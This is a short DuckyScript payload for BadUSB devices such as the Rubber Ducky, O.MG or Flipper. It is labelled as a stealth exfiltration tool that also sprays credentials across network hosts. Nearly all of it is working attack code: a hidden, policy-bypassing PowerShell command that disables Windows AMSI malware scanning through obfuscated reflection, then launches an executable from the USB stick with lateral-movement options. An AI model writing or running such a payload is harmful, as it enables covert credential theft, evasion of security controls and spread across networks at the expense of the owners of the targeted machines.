REM ============================================================
REM TREASURE-HUNTER: Stealth Exfil (USB)
REM ============================================================
REM Same as smash-grab but with lateral movement enabled.
REM Scans local + sprays creds against up to 5 network hosts.
REM
REM Prerequisites: treasure-hunter.exe on USB root
REM Device: Hak5 Rubber Ducky / O.MG / Flipper BadUSB
REM ============================================================

DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -nop -c "$a=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUtils');$f=$a.GetField('am'+'siInitFailed','NonPublic,Static');$f.SetValue($null,$true);$d=(Get-Volume|?{Test-Path \"$($_.DriveLetter):\treasure-hunter.exe\"}).DriveLetter;if($d){& \"$d`:\treasure-hunter.exe\" --auto --lateral --lateral-max-hosts 5 --passphrase 'CHANGE-ME'}"
ENTER
